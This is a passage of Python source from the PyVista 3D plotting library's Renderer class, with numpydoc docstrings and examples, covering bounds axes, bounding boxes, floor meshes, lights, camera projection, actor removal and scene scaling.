A default is looked up on the active theme.\n\n        minor_ticks : bool, default: False\n            If ``True``, also plot minor ticks on all axes.\n\n        padding : float, default: 0.0\n            An optional percent padding along each axial direction to\n            cushion the datasets in the scene from the axes\n            annotations. Defaults to no padding.\n\n        use_3d_text : bool, default: True\n            Use ``vtkTextActor3D`` for titles and labels.\n\n        render : bool, optional\n            If the render window is being shown, trigger a render\n            after showing bounds.\n\n        **kwargs : dict, optional\n            Deprecated keyword arguments.\n\n        Returns\n        -------\n        vtk.vtkCubeAxesActor\n            Bounds actor.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> from pyvista import examples\n\n        >>> mesh = pv.Sphere()\n        >>> plotter = pv.Plotter()\n        >>> actor = plotter.add_mesh(mesh)\n        >>> actor = plotter.show_bounds(\n        ...     grid='front',\n        ...     location='outer',\n        ...     all_edges=True,\n        ... )\n        >>> plotter.show()\n\n        Control how many labels are displayed.\n\n        >>> mesh = examples.load_random_hills()\n\n        >>> plotter = pv.Plotter()\n        >>> actor = plotter.add_mesh(\n        ...     mesh, cmap='terrain', show_scalar_bar=False\n        ... )\n        >>> actor = plotter.show_bounds(\n        ...     grid='back',\n        ...     location='outer',\n        ...     ticks='both',\n        ...     n_xlabels=2,\n        ...     n_ylabels=2,\n        ...     n_zlabels=2,\n        ...     xtitle='Easting',\n        ...     ytitle='Northing',\n        ...     ztitle='Elevation',\n        ... )\n        >>> plotter.show()\n\n        Hide labels, but still show axis titles.\n\n        >>> plotter = pv.Plotter()\n        >>> actor = plotter.add_mesh(\n        ...     mesh, cmap='terrain', show_scalar_bar=False\n        ... )\n        >>> actor = plotter.show_bounds(\n        ...     grid='back',\n        ...     location='outer',\n        ...     ticks='both',\n        ...     show_xlabels=False,\n        ...     show_ylabels=False,\n        ...     show_zlabels=False,\n        ...     xtitle='Easting',\n        ...     ytitle='Northing',\n        ...     ztitle='Elevation',\n        ... )\n        >>> plotter.show()\n\n        \"\"\"\n        self.remove_bounds_axes()\n\n        if font_family is None:\n            font_family = self._theme.font.family\n        if font_size is None:\n            font_size = self._theme.font.size\n        if fmt is None:\n            fmt = self._theme.font.fmt\n        if fmt is None:\n            fmt = '%.1f' # fallback\n\n        if 'xlabel' in kwargs: # pragma: no cover\n            xtitle = kwargs.pop('xlabel')\n            warnings.warn(\n                \"`xlabel` is deprecated. Use `xtitle` instead.\",\n                PyVistaDeprecationWarning,\n            )\n        if 'ylabel' in kwargs: # pragma: no cover\n            ytitle = kwargs.pop('ylabel')\n            warnings.warn(\n                \"`ylabel` is deprecated. Use `ytitle` instead.\",\n                PyVistaDeprecationWarning,\n            )\n        if 'zlabel' in kwargs: # pragma: no cover\n            ztitle = kwargs.pop('zlabel')\n            warnings.warn(\n                \"`zlabel` is deprecated. 
Use `ztitle` instead.\",\n                PyVistaDeprecationWarning,\n            )\n        assert_empty_kwargs(**kwargs)\n\n        color = Color(color, default_color=self._theme.font.color)\n\n        if mesh is None and bounds is None:\n            # Use the bounds of all data in the rendering window\n            bounds = np.array(self.bounds)\n        elif bounds is None:\n            # otherwise, use the bounds of the mesh (if available)\n            bounds = np.array(mesh.bounds)\n        else:\n            bounds = np.asanyarray(bounds, dtype=float)\n\n        # create actor\n        cube_axes_actor = pyvista.CubeAxesActor(\n            self.camera,\n            minor_ticks=minor_ticks,\n            tick_location=ticks,\n            x_title=xtitle,\n            y_title=ytitle,\n            z_title=ztitle,\n            x_axis_visibility=show_xaxis,\n            y_axis_visibility=show_yaxis,\n            z_axis_visibility=show_zaxis,\n            x_label_format=fmt,\n            y_label_format=fmt,\n            z_label_format=fmt,\n            x_label_visibility=show_xlabels,\n            y_label_visibility=show_ylabels,\n            z_label_visibility=show_zlabels,\n            n_xlabels=n_xlabels,\n            n_ylabels=n_ylabels,\n            n_zlabels=n_zlabels,\n        )\n\n        cube_axes_actor.use_2d_mode = use_2d or not np.allclose(self.scale, [1.0, 1.0, 1.0])\n\n        if grid:\n            grid = 'back' if grid is True else grid\n            if not isinstance(grid, str):\n                raise TypeError(f'`grid` must be a str, not {type(grid)}')\n            grid = grid.lower()\n            if grid in ('front', 'frontface'):\n                cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_CLOSEST)\n            elif grid in ('both', 'all'):\n                cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_ALL)\n            elif grid in ('back', True):\n                cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_FURTHEST)\n            else:\n                raise ValueError(f'`grid` must be either \"front\", \"back\", or \"all\", not {grid}')\n            # Only show user desired grid lines\n            cube_axes_actor.SetDrawXGridlines(show_xaxis)\n            cube_axes_actor.SetDrawYGridlines(show_yaxis)\n            cube_axes_actor.SetDrawZGridlines(show_zaxis)\n            # Set the colors\n            cube_axes_actor.GetXAxesGridlinesProperty().SetColor(color.float_rgb)\n            cube_axes_actor.GetYAxesGridlinesProperty().SetColor(color.float_rgb)\n            cube_axes_actor.GetZAxesGridlinesProperty().SetColor(color.float_rgb)\n\n        if isinstance(location, str):\n            location = location.lower()\n            if location == 'all':\n                cube_axes_actor.SetFlyModeToStaticEdges()\n            elif location == 'origin':\n                cube_axes_actor.SetFlyModeToStaticTriad()\n            elif location == 'outer':\n                cube_axes_actor.SetFlyModeToOuterEdges()\n            elif location in ('default', 'closest', 'front'):\n                cube_axes_actor.SetFlyModeToClosestTriad()\n            elif location in ('furthest', 'back'):\n                cube_axes_actor.SetFlyModeToFurthestTriad()\n            else:\n                raise ValueError(\n                    f'Value of location (\"{location}\") should be either \"all\", \"origin\",'\n                    ' \"outer\", \"default\", \"closest\", \"front\", \"furthest\", or \"back\".'\n                )\n        elif location is not None:\n            raise TypeError('location must be a string')\n\n        if isinstance(padding, (int, float)) and 0.0 <= padding < 1.0:\n            if not np.any(np.abs(bounds) == np.inf):\n                cushion = (\n                    np.array(\n                        [\n                            np.abs(bounds[1] - bounds[0]),\n                            np.abs(bounds[3] - bounds[2]),\n                            np.abs(bounds[5] - bounds[4]),\n                        ]\n                    )\n                    * padding\n                )\n                bounds[::2] -= cushion\n                bounds[1::2] += cushion\n        else:\n            raise ValueError(f'padding ({padding}) not understood. 
Must be float between 0 and 1')\n cube_axes_actor.bounds = bounds\n\n # set axes ranges if input\n if axes_ranges is not None:\n if isinstance(axes_ranges, (collections.abc.Sequence, np.ndarray)):\n axes_ranges = np.asanyarray(axes_ranges)\n else:\n raise TypeError('Input axes_ranges must be a numeric sequence.')\n\n if not np.issubdtype(axes_ranges.dtype, np.number):\n raise TypeError('All of the elements of axes_ranges must be numbers.')\n\n # set the axes ranges\n if axes_ranges.shape != (6,):\n raise ValueError(\n '`axes_ranges` must be passed as a [xmin, xmax, ymin, ymax, zmin, zmax] sequence.'\n )\n\n cube_axes_actor.x_axis_range = axes_ranges[0], axes_ranges[1]\n cube_axes_actor.y_axis_range = axes_ranges[2], axes_ranges[3]\n cube_axes_actor.z_axis_range = axes_ranges[4], axes_ranges[5]\n\n # set color\n cube_axes_actor.GetXAxesLinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetYAxesLinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetZAxesLinesProperty().SetColor(color.float_rgb)\n\n # set font\n font_family = parse_font_family(font_family)\n\n if not use_3d_text or not np.allclose(self.scale, [1.0, 1.0, 1.0]):\n use_3d_text = False\n cube_axes_actor.SetUseTextActor3D(False)\n else:\n cube_axes_actor.SetUseTextActor3D(True)\n\n props = [\n cube_axes_actor.GetTitleTextProperty(0),\n cube_axes_actor.GetTitleTextProperty(1),\n cube_axes_actor.GetTitleTextProperty(2),\n cube_axes_actor.GetLabelTextProperty(0),\n cube_axes_actor.GetLabelTextProperty(1),\n cube_axes_actor.GetLabelTextProperty(2),\n ]\n\n for prop in props:\n prop.SetColor(color.float_rgb)\n prop.SetFontFamily(font_family)\n prop.SetBold(bold)\n\n # this merely makes the font sharper\n if use_3d_text:\n prop.SetFontSize(50)\n\n # Note: font_size does nothing as a property, use SetScreenSize instead\n # Here, we normalize relative to 12 to give the user an illusion of\n # just changing the font size relative to a font size of 12. 
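For example, font_size=24 maps to a screen size of 24 / 12 * 10 = 20. 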
10 is used\n        # here since it's the default \"screen size\".\n        cube_axes_actor.SetScreenSize(font_size / 12 * 10.0)\n\n        self.add_actor(cube_axes_actor, reset_camera=False, pickable=False, render=render)\n        self.cube_axes_actor = cube_axes_actor\n\n        if all_edges:\n            self.add_bounding_box(color=color, corner_factor=corner_factor)\n\n        self.Modified()\n        return cube_axes_actor\n\n    def show_grid(self, **kwargs):\n        \"\"\"Show grid lines and bounds axes labels.\n\n        A wrapped implementation of :func:`Renderer.show_bounds` that\n        changes the default behavior to use grid lines and show the\n        axes labels on the outer edges.\n\n        This is intended to be similar to :func:`matplotlib.pyplot.grid`.\n\n        Parameters\n        ----------\n        **kwargs : dict, optional\n            See :func:`Renderer.show_bounds` for additional keyword\n            arguments.\n\n        Returns\n        -------\n        vtk.vtkAxesActor\n            Bounds actor.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> mesh = pv.Cone()\n        >>> pl = pv.Plotter()\n        >>> _ = pl.add_mesh(mesh)\n        >>> _ = pl.show_grid()\n        >>> pl.show()\n\n        \"\"\"\n        kwargs.setdefault('grid', 'back')\n        kwargs.setdefault('location', 'outer')\n        kwargs.setdefault('ticks', 'both')\n        return self.show_bounds(**kwargs)\n\n    def remove_bounding_box(self, render=True):\n        \"\"\"Remove bounding box.\n\n        Parameters\n        ----------\n        render : bool, default: True\n            Trigger a render once the bounding box is removed.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> _ = pl.add_bounding_box()\n        >>> pl.remove_bounding_box()\n\n        \"\"\"\n        if hasattr(self, '_box_object'):\n            actor = self.bounding_box_actor\n            self.bounding_box_actor = None\n            del self._box_object\n            self.remove_actor(actor, reset_camera=False, render=render)\n            self.Modified()\n\n    def add_bounding_box(\n        self,\n        color=\"grey\",\n        corner_factor=0.5,\n        line_width=None,\n        opacity=1.0,\n        render_lines_as_tubes=False,\n        lighting=None,\n        reset_camera=None,\n        outline=True,\n        culling='front',\n    ):\n        \"\"\"Add an unlabeled and unticked box at the boundaries of plot.\n\n        Useful for when wanting to plot outer grids while still\n        retaining all edges of the boundary.\n\n        Parameters\n        ----------\n        color : ColorLike, default: \"grey\"\n            Color of the bounding box.\n            Either a string, rgb sequence, or hex color string. For\n            example:\n\n            * ``color='white'``\n            * ``color='w'``\n            * ``color=[1.0, 1.0, 1.0]``\n            * ``color='#FFFFFF'``\n\n        corner_factor : float, default: 0.5\n            The factor along each axis to draw the default box. The\n            default of 0.5 shows the full box.\n\n        line_width : float, optional\n            Thickness of lines.\n\n        opacity : float, default: 1.0\n            Opacity of mesh. Should be between 0 and 1.\n\n        render_lines_as_tubes : bool, default: False\n            Show lines as thick tubes rather than flat lines. Control\n            the width with ``line_width``.\n\n        lighting : bool, optional\n            Enable or disable directional lighting for this actor.\n\n        reset_camera : bool, optional\n            Reset camera position when ``True`` to include all actors.\n\n        outline : bool, default: True\n            When ``False``, a box with faces is\n            shown with the specified culling.\n\n        culling : str, default: \"front\"\n            Does not render faces on the bounding box that are culled. 
Options\n            are ``'front'`` or ``'back'``.\n\n        Returns\n        -------\n        vtk.vtkActor\n            VTK actor of the bounding box.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> _ = pl.add_mesh(pv.Sphere())\n        >>> _ = pl.add_bounding_box(line_width=5, color='black')\n        >>> pl.show()\n\n        \"\"\"\n        if lighting is None:\n            lighting = self._theme.lighting\n\n        self.remove_bounding_box()\n        if outline:\n            self._bounding_box = _vtk.vtkOutlineCornerSource()\n            self._bounding_box.SetCornerFactor(corner_factor)\n        else:\n            self._bounding_box = _vtk.vtkCubeSource()\n        self._bounding_box.SetBounds(self.bounds)\n        self._bounding_box.Update()\n        self._box_object = wrap(self._bounding_box.GetOutput())\n        name = f'BoundingBox({hex(id(self._box_object))})'\n\n        mapper = _vtk.vtkDataSetMapper()\n        mapper.SetInputData(self._box_object)\n        self.bounding_box_actor, prop = self.add_actor(\n            mapper, reset_camera=reset_camera, name=name, culling=culling, pickable=False\n        )\n\n        prop.SetColor(Color(color, default_color=self._theme.outline_color).float_rgb)\n        prop.SetOpacity(opacity)\n        if render_lines_as_tubes:\n            prop.SetRenderLinesAsTubes(render_lines_as_tubes)\n\n        # lighting display style\n        if lighting is False:\n            prop.LightingOff()\n\n        # set line thickness\n        if line_width:\n            prop.SetLineWidth(line_width)\n\n        prop.SetRepresentationToSurface()\n        self.Modified()\n        return self.bounding_box_actor\n\n    def add_floor(\n        self,\n        face='-z',\n        i_resolution=10,\n        j_resolution=10,\n        color=None,\n        line_width=None,\n        opacity=1.0,\n        show_edges=False,\n        lighting=False,\n        edge_color=None,\n        reset_camera=None,\n        pad=0.0,\n        offset=0.0,\n        pickable=False,\n        store_floor_kwargs=True,\n    ):\n        \"\"\"Show a floor mesh.\n\n        This generates planes at the boundaries of the scene to behave\n        like floors or walls.\n\n        Parameters\n        ----------\n        face : str, default: \"-z\"\n            The face at which to place the plane. Options are\n            (``'-z'``, ``'-y'``, ``'-x'``, ``'+z'``, ``'+y'``, and\n            ``'+x'``), where the ``-/+`` sign indicates on which side of\n            the axis the plane will lie. For example, ``'-z'`` would\n            generate a floor on the XY-plane and the bottom of the\n            scene (minimum z).\n\n        i_resolution : int, default: 10\n            Number of points on the plane in the i direction.\n\n        j_resolution : int, default: 10\n            Number of points on the plane in the j direction.\n\n        color : ColorLike, optional\n            Color of the floor mesh. Default gray.\n            Either a string, rgb list, or hex color string.\n\n        line_width : float, optional\n            Thickness of the edges when ``show_edges`` is ``True``.\n            Only valid for wireframe and surface representations.\n\n        opacity : float, default: 1.0\n            The opacity of the generated surface.\n\n        show_edges : bool, default: False\n            Flag on whether to show the mesh edges for tiling.\n
\n        lighting : bool, default: False\n            Enable or disable view direction lighting.\n\n        edge_color : ColorLike, optional\n            Color of the edges of the mesh.\n\n        reset_camera : bool, optional\n            Resets the camera when ``True`` after adding the floor.\n\n        pad : float, default: 0.0\n            Percentage padding between 0 and 1.\n\n        offset : float, default: 0.0\n            Percentage offset along plane normal.\n\n        pickable : bool, default: False\n            Make this floor actor pickable in the renderer.\n\n        store_floor_kwargs : bool, default: True\n            Stores the keyword arguments used when adding this floor.\n            Useful when updating the bounds and regenerating the\n            floor.\n\n        Returns\n        -------\n        vtk.vtkActor\n            VTK actor of the floor.\n\n        Examples\n        --------\n        Add a floor below a sphere and plot it.\n\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> actor = pl.add_mesh(pv.Sphere())\n        >>> actor = pl.add_floor()\n        >>> pl.show()\n\n        \"\"\"\n        if store_floor_kwargs:\n            kwargs = locals()\n            kwargs.pop('self')\n            self._floor_kwargs.append(kwargs)\n        ranges = np.array(self.bounds).reshape(-1, 2).ptp(axis=1)\n        ranges += ranges * pad\n        center = np.array(self.center)\n        if face.lower() == '-z':\n            center[2] = self.bounds[4] - (ranges[2] * offset)\n            normal = (0, 0, 1)\n            i_size = ranges[0]\n            j_size = ranges[1]\n        elif face.lower() == '-y':\n            center[1] = self.bounds[2] - (ranges[1] * offset)\n            normal = (0, 1, 0)\n            i_size = ranges[0]\n            j_size = ranges[2]\n        elif face.lower() == '-x':\n            center[0] = self.bounds[0] - (ranges[0] * offset)\n            normal = (1, 0, 0)\n            i_size = ranges[2]\n            j_size = ranges[1]\n        elif face.lower() == '+z':\n            center[2] = self.bounds[5] + (ranges[2] * offset)\n            normal = (0, 0, -1)\n            i_size = ranges[0]\n            j_size = ranges[1]\n        elif face.lower() == '+y':\n            center[1] = self.bounds[3] + (ranges[1] * offset)\n            normal = (0, -1, 0)\n            i_size = ranges[0]\n            j_size = ranges[2]\n        elif face.lower() == '+x':\n            center[0] = self.bounds[1] + (ranges[0] * offset)\n            normal = (-1, 0, 0)\n            i_size = ranges[2]\n            j_size = ranges[1]\n        else:\n            raise NotImplementedError(f'Face ({face}) not implemented')\n        self._floor = pyvista.Plane(\n            center=center,\n            direction=normal,\n            i_size=i_size,\n            j_size=j_size,\n            i_resolution=i_resolution,\n            j_resolution=j_resolution,\n        )\n        self._floor.clear_data()\n\n        if lighting is None:\n            lighting = self._theme.lighting\n\n        self.remove_bounding_box()\n        mapper = _vtk.vtkDataSetMapper()\n        mapper.SetInputData(self._floor)\n        actor, prop = self.add_actor(\n            mapper, reset_camera=reset_camera, name=f'Floor({face})', pickable=pickable\n        )\n\n        prop.SetColor(Color(color, default_color=self._theme.floor_color).float_rgb)\n        prop.SetOpacity(opacity)\n\n        # edge display style\n        if show_edges:\n            prop.EdgeVisibilityOn()\n            prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb)\n\n        # lighting display style\n        if lighting is False:\n            prop.LightingOff()\n\n        # set line thickness\n        if line_width:\n            prop.SetLineWidth(line_width)\n\n        prop.SetRepresentationToSurface()\n        self._floors.append(actor)\n        return actor\n\n    def remove_floors(self, clear_kwargs=True, render=True):\n        \"\"\"Remove all floor actors.\n\n        Parameters\n        ----------\n        clear_kwargs : bool, default: True\n            Clear default floor arguments.\n\n        render : bool, default: True\n            Render upon removing the floor.\n\n        Examples\n        --------\n        Add a floor below a sphere, remove it, and then plot it.\n\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> actor = pl.add_mesh(pv.Sphere())\n        >>> actor = pl.add_floor()\n        >>> 
pl.remove_floors()\n        >>> pl.show()\n\n        \"\"\"\n        if getattr(self, '_floor', None) is not None:\n            self._floor.ReleaseData()\n            self._floor = None\n        for actor in self._floors:\n            self.remove_actor(actor, reset_camera=False, render=render)\n        self._floors.clear()\n        if clear_kwargs:\n            self._floor_kwargs.clear()\n\n    def remove_bounds_axes(self):\n        \"\"\"Remove bounds axes.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter(shape=(1, 2))\n        >>> pl.subplot(0, 0)\n        >>> actor = pl.add_mesh(pv.Sphere())\n        >>> actor = pl.show_bounds(grid='front', location='outer')\n        >>> pl.subplot(0, 1)\n        >>> actor = pl.add_mesh(pv.Sphere())\n        >>> actor = pl.show_bounds(grid='front', location='outer')\n        >>> actor = pl.remove_bounds_axes()\n        >>> pl.show()\n\n        \"\"\"\n        if self.cube_axes_actor is not None:\n            self.remove_actor(self.cube_axes_actor)\n            self.cube_axes_actor = None\n            self.Modified()\n\n    def add_light(self, light):\n        \"\"\"Add a light to the renderer.\n\n        Parameters\n        ----------\n        light : vtk.vtkLight or pyvista.Light\n            Light to add.\n\n        \"\"\"\n        # convert from a vtk type if applicable\n        if isinstance(light, _vtk.vtkLight) and not isinstance(light, pyvista.Light):\n            light = pyvista.Light.from_vtk(light)\n\n        if not isinstance(light, pyvista.Light):\n            raise TypeError(f'Expected Light instance, got {type(light).__name__} instead.')\n        self._lights.append(light)\n        self.AddLight(light)\n        self.Modified()\n\n        # we add the renderer to add/remove the light actor if\n        # positional or cone angle is modified\n        light.add_renderer(self)\n\n    @property\n    def lights(self): # numpydoc ignore=RT01\n        \"\"\"Return a list of all lights in the renderer.\n\n        Returns\n        -------\n        list\n            Lights in the renderer.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> pl.renderer.lights # doctest:+SKIP\n        [<Light (Headlight) at 0x7f1dd8155820>,\n         <Light (Camera Light) at 0x7f1dd8155760>,\n         <Light (Camera Light) at 0x7f1dd8155340>,\n         <Light (Camera Light) at 0x7f1dd8155580>,\n         <Light (Camera Light) at 0x7f1dd81558e0>]\n\n        \"\"\"\n        return list(self.GetLights())\n\n    def remove_all_lights(self):\n        \"\"\"Remove all lights from the renderer.\"\"\"\n        self.RemoveAllLights()\n        self._lights.clear()\n\n    def clear_actors(self):\n        \"\"\"Remove all actors (keep lights and properties).\"\"\"\n        if self._actors:\n            for actor in list(self._actors):\n                try:\n                    self.remove_actor(actor, reset_camera=False, render=False)\n                except KeyError:\n                    pass\n            self.Modified()\n\n    def clear(self):\n        \"\"\"Remove all actors and properties.\"\"\"\n        self.clear_actors()\n        if self.__charts is not None:\n            self._charts.deep_clean()\n        self.remove_all_lights()\n        self.RemoveAllViewProps()\n        self.Modified()\n\n        self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))\n        self._scalar_bar_slot_lookup = {}\n\n    def set_focus(self, point):\n        \"\"\"Set focus to a point.\n\n        Parameters\n        ----------\n        point : sequence[float]\n            Cartesian point to focus on in the form of ``[x, y, z]``.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> mesh = pv.Cube()\n        >>> pl = pv.Plotter()\n        >>> _ = pl.add_mesh(mesh, show_edges=True)\n        >>> _ = pl.add_point_labels([mesh.points[1]], [\"Focus\"])\n        >>> _ = pl.camera # this initializes the camera\n        >>> pl.set_focus(mesh.points[1])\n        >>> pl.show()\n\n        \"\"\"\n        if isinstance(point, np.ndarray):\n            if point.ndim != 1:\n                point = point.ravel()\n        self.camera.focal_point = scale_point(self.camera, point, invert=False)\n        self.camera_set = True\n        self.Modified()\n\n    def set_position(self, point, reset=False, render=True):\n        \"\"\"Set camera position to a point.\n\n        Parameters\n        ----------\n        point : sequence\n            Cartesian point to focus on in the form of ``[x, y, z]``.\n\n        reset : bool, default: False\n            Whether to reset the 
camera after setting the camera\n position.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the position.\n\n Examples\n --------\n Move the camera far away to ``[7, 7, 7]``.\n\n >>> import pyvista as pv\n >>> mesh = pv.Cube()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh, show_edges=True)\n >>> pl.set_position([7, 7, 7])\n >>> pl.show()\n\n \"\"\"\n if isinstance(point, np.ndarray):\n if point.ndim != 1:\n point = point.ravel()\n self.camera.position = scale_point(self.camera, point, invert=False)\n if reset:\n self.reset_camera(render=render)\n self.camera_set = True\n self.Modified()\n\n def set_viewup(self, vector, reset=True, render=True):\n \"\"\"Set camera viewup vector.\n\n Parameters\n ----------\n vector : sequence[float]\n New camera viewup vector.\n\n reset : bool, default: True\n Whether to reset the camera after setting the camera\n position.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the viewup.\n\n Examples\n --------\n Look from the top down by setting view up to ``[0, 1, 0]``.\n Notice how the Y axis appears vertical.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.set_viewup([0, 1, 0])\n >>> pl.show()\n\n \"\"\"\n if isinstance(vector, np.ndarray):\n if vector.ndim != 1:\n vector = vector.ravel()\n\n self.camera.up = vector\n if reset:\n self.reset_camera(render=render)\n\n self.camera_set = True\n self.Modified()\n\n def enable_parallel_projection(self):\n \"\"\"Enable parallel projection.\n\n The camera will have a parallel projection. Parallel projection is\n often useful when viewing images or 2D datasets.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> from pyvista import demos\n >>> pl = pv.demos.orientation_plotter()\n >>> pl.enable_parallel_projection()\n >>> pl.show()\n\n \"\"\"\n # Fix the 'reset camera' effect produced by the VTK when parallel\n # projection is enabled.\n angle = np.radians(self.camera.view_angle)\n self.camera.parallel_scale = self.camera.distance * np.sin(0.5 * angle)\n\n self.camera.enable_parallel_projection()\n self.Modified()\n\n def disable_parallel_projection(self):\n \"\"\"Reset the camera to use perspective projection.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> from pyvista import demos\n >>> pl = pv.demos.orientation_plotter()\n >>> pl.disable_parallel_projection()\n >>> pl.show()\n\n \"\"\"\n # Fix the 'reset camera' effect produced by the VTK when parallel\n # projection is disabled.\n focus = self.camera.focal_point\n angle = np.radians(self.camera.view_angle)\n distance = self.camera.parallel_scale / np.sin(0.5 * angle)\n direction = self.camera.direction\n x = focus[0] - distance * direction[0]\n y = focus[1] - distance * direction[1]\n z = focus[2] - distance * direction[2]\n self.camera.position = (x, y, z)\n self.ResetCameraClippingRange()\n\n self.camera.disable_parallel_projection()\n self.Modified()\n\n @property\n def parallel_projection(self): # numpydoc ignore=RT01\n \"\"\"Return parallel projection state of active render window.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.parallel_projection = False\n >>> pl.parallel_projection\n False\n \"\"\"\n return self.camera.parallel_projection\n\n @parallel_projection.setter\n def parallel_projection(self, state): # numpydoc ignore=GL08\n self.camera.parallel_projection = state\n self.Modified()\n\n @property\n def parallel_scale(self): # numpydoc 
ignore=RT01\n        \"\"\"Return parallel scale of active render window.\n\n        Examples\n        --------\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> pl.parallel_scale = 2\n        \"\"\"\n        return self.camera.parallel_scale\n\n    @parallel_scale.setter\n    def parallel_scale(self, value): # numpydoc ignore=GL08\n        self.camera.parallel_scale = value\n        self.Modified()\n\n    def remove_actor(self, actor, reset_camera=False, render=True):\n        \"\"\"Remove an actor from the Renderer.\n\n        Parameters\n        ----------\n        actor : str, vtk.vtkActor, list or tuple\n            If the type is ``str``, removes the previously added actor\n            with the given name. If the type is ``vtk.vtkActor``,\n            removes the actor if it's previously added to the\n            Renderer. If ``list`` or ``tuple``, iteratively removes\n            each actor.\n\n        reset_camera : bool, optional\n            Resets camera so all actors can be seen.\n\n        render : bool, optional\n            Render upon actor removal. Set this to ``False`` to stop\n            the render window from rendering when an actor is removed.\n\n        Returns\n        -------\n        bool\n            ``True`` when actor removed. ``False`` when actor has not\n            been removed.\n\n        Examples\n        --------\n        Add two meshes to a plotter and then remove the cube actor.\n\n        >>> import pyvista as pv\n        >>> mesh = pv.Cube()\n        >>> pl = pv.Plotter()\n        >>> cube_actor = pl.add_mesh(pv.Cube(), show_edges=True)\n        >>> sphere_actor = pl.add_mesh(pv.Sphere(), show_edges=True)\n        >>> _ = pl.remove_actor(cube_actor)\n        >>> pl.show()\n\n        \"\"\"\n        name = None\n        if isinstance(actor, str):\n            name = actor\n            keys = list(self._actors.keys())\n            names = []\n            for k in keys:\n                if k.startswith(f'{name}-'):\n                    names.append(k)\n            if len(names) > 0:\n                self.remove_actor(names, reset_camera=reset_camera, render=render)\n            try:\n                actor = self._actors[name]\n            except KeyError:\n                # If an actor of that name is not present, there is nothing to remove\n                return False\n        if isinstance(actor, collections.abc.Iterable):\n            success = False\n            for a in actor:\n                rv = self.remove_actor(a, reset_camera=reset_camera, render=render)\n                if rv or success:\n                    success = True\n            return success\n        if actor is None:\n            return False\n\n        # remove any labels associated with the actor\n        self._labels.pop(actor.GetAddressAsString(\"\"), None)\n\n        # ensure any scalar bars associated with this actor are removed\n        try:\n            self.parent.scalar_bars._remove_mapper_from_plotter(actor)\n        except (AttributeError, ReferenceError):\n            pass\n        self.RemoveActor(actor)\n\n        if name is None:\n            for k, v in self._actors.items():\n                if v == actor:\n                    name = k\n        self._actors.pop(name, None)\n        self.update_bounds_axes()\n        if reset_camera:\n            self.reset_camera(render=render)\n        elif not self.camera_set and reset_camera is None:\n            self.reset_camera(render=render)\n        elif render:\n            self.parent.render()\n\n        self.Modified()\n        return True\n\n    def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True, render=True):\n        \"\"\"Scale all the actors in the scene.\n\n        Scaling is performed independently on the X, Y, and Z axes.\n        A scale of zero is illegal and will be replaced with one.\n\n        .. warning::\n            Setting the scale on the renderer is a convenience method to\n            individually scale each of the actors in the scene. If a scale\n            was set on an actor previously, it will be reset to the scale\n            of this Renderer.\n\n        Parameters\n        ----------\n        xscale : float, optional\n            Scaling in the x direction. Default is ``None``, which\n            does not change existing scaling.\n\n        yscale : float, optional\n            Scaling in the y direction. 
Default is ``None``, which\n does not change existing scaling.\n\n zscale : float, optional\n Scaling in the z direction. Default is ``None``, which\n does not change existing scaling.\n\n reset_camera : bool, default: True\n Resets camera so all actors can be seen.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the scale.\n\n Examples\n --------\n Set the scale in the z direction to be 2 times that of\n nominal. Leave the other axes unscaled.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.set_scale(zscale=2)\n >>> _ = pl.add_mesh(pv.Sphere()) # perfect sphere\n >>> pl.show()\n\n \"\"\"\n if xscale is None:\n xscale = self.scale[0]\n if yscale is None:\n yscale = self.scale[1]\n if zscale is None:\n zscale = self.scale[2]\n self.scale = [xscale, yscale, zscale]\n\n # Reset all actors to match this scale\n for actor in self.actors.values():\n if hasattr(actor, 'SetScale'):\n actor.SetScale(self.scale)\n\n self.parent.render()\n if reset_camera:\n self.update_bounds_axes()\n self.reset_camera(render=render)\n self.Modified()\n\n def get_default_cam_pos(self, negative=False):\n \"\"\"Return the default focal points and viewup.\n\n Uses ResetCamera to make a useful view.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n Returns\n -------\n list\n List of camera position:\n\n * Position\n * Focal point\n * View up\n\n \"\"\"\n focal_pt = self.center\n if any(np.isnan(focal_pt)):\n focal_pt = (0.0, 0.0, 0.0)\n position = np.array(self._theme.camera['position']).astype(float)\n if negative:\n position *= -1\n position = position / np.array(self.scale).astype(float)\n cpos = [position + np.array(focal_pt), focal_pt, self._theme.camera['viewup']]\n return cpos\n\n def update_bounds_axes(self):\n \"\"\"Update the bounds axes of the render window.\"\"\"\n if (\n hasattr(self, '_box_object')\n and self._box_object is not None\n and self.bounding_box_actor is not None\n ):\n if not np.allclose(self._box_object.bounds, self.bounds):\n color = self.bounding_box_actor.GetProperty().GetColor()\n self.remove_bounding_box()\n self.add_bounding_box(color=color)\n self.remove_floors(clear_kwargs=False)\n for floor_kwargs in self._floor_kwargs:\n floor_kwargs['store_floor_kwargs'] = False\n 